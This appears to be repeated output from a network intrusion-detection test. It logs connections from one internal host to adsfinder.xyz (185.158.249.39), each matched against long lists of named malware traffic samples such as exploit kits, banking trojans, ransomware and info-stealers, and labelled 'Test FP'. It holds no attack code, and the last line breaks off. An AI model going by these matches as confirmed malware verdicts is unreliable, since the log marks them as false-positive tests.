emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49348 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49349 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49360 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49361 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49381 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49382 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49384 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49385 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49386 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49387 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49389 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, 